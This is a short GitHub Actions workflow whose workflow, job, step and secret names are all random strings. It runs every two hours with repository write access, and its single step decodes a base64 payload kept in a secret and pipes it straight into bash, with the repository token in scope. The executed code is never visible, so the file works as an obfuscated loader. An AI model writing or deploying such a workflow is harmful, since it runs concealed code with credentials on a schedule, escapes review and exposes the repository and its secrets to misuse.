name: L1WPSNZP0i
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  pxlQwlhqMt3:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.rY2z3gJQwdZ }}
      - name: iOdpsPa2xp5y
        env:
          wCiUm: ${{ secrets.BL2a5Rf }}
          FQOUgw: ${{ secrets.ojnBo6bvt }}
          lEWKLT: ${{ secrets.K1JzPe69AJm }}
          GITHUB_TOKEN: ${{ secrets.rY2z3gJQwdZ }}
        run: echo "$wCiUm" | base64 -d | bash
